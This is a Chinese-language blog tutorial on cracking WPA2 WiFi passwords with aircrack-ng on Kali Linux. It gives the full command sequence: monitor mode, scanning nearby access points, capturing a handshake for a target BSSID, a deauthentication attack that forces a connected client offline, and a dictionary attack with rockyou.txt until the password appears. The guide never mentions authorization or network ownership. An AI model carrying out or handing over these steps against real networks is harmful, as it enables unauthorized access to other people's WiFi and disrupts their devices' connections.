一、aircrack-ng简介
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据
二、工具准备
kali、USB无线网卡,如Ralink 802.11n
三、WIFI破解过程
1、WIFI信息收集
1.1使用命令列举网卡信息,查找无线网卡名称:iwconfig
发现无线网卡wlan0
1.2开启无线网卡监听模式:airmon-ng start <无线网卡名称>
airmon-ng start wlan0
1.3查看无线网卡监听模式是否打开:iwconfig
无线网卡wlan0处于监听模式,名称为wlan0mon
1.4扫描附件wifi热点信息:airodump-ng <处于监听模式的网卡名称>
airodump-ng wlan0mon
输出的列表在不停的刷新显示。表示扫描到的无线网络 AP 信息:
BSSID: 无线 AP 的硬件地址;
PWR: 信号强度,值是负数,绝对值越小表示信号越强;
Beacons:无线AP发出的通告编号;
#Data:被捕获到的数据分组的数量(一般数据量越大,抓取握手包更容易);
#/s:过去10秒钟内每秒捕获数据分组的数量;
MB:无线AP所支持的最大速率;
CH: 无线网络信道;
ENC: 加密方式,要破解的是 WPA2;
CIPHER:加密算法;
AUTH:使用的认证协议;E
SSID: 无线网络的名称
2、握手包抓取
抓取握手包:airodump-ng -c <CH> --bssid <BSSID> -w <要保存握手包的目录> <处于监听模式的网卡名称>
airodump-ng --bssid 64:09:80:4A:A2:C9 -c 11 -w /home wlan0mon
抓包界面如下图所示:
要抓握手包,需要客户端在wifi重新认证连接的情况下才能抓到。可使用下列命令让客户端下线,以便客户端重新连接。
- 发送反认证包,让客户端下线。客户端重新连接,便于抓取握手包:aireplay-ng -0 <发送反认证包的个数> -a <BSSID> -c <强制下线的MAC地址(STATION下面的地址)> 无线网卡名称
- 采用Deauth攻击模式,后面紧跟攻击次数,这里设置为20,大家可以根据实际情况设置;-a:后面跟AP的mac地址;-c:后面跟客户端的mac地址。
aireplay-ng -0 20 -a 80:xx:xx:xx:xx:28 -c 18:yy:yy:yy:yy:40 wlan0mon
如此,18:yy:yy:yy:yy:40被强制下线。
当客户端再次连接wifi时,抓取80:xx:xx:xx:xx:28 与 18:yy:yy:yy:yy:40间连接的握手包:
抓到握手包之后,Ctrl+C停止抓包。查看对应目录下的包含握手信息的包:
3、WIFI密码破解
结合密码字典,使用aircrack-ng进行破解:aircrack-ng -w <本地的字典文件> <握手包>
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home-01.cap
出现KEY FOUND,则表示破解成功,括号中字符串即为密码
注意:
实操过程中,可能出现无法收集到WiFi信息的情况,拔掉无线网卡重新插入,或者重启虚拟机即可。
参考链接:利用kali破解WIFI密码
版权属于:DATA
本文链接:https://zhlblog.cn/default/37.html
转载时须注明出处及本声明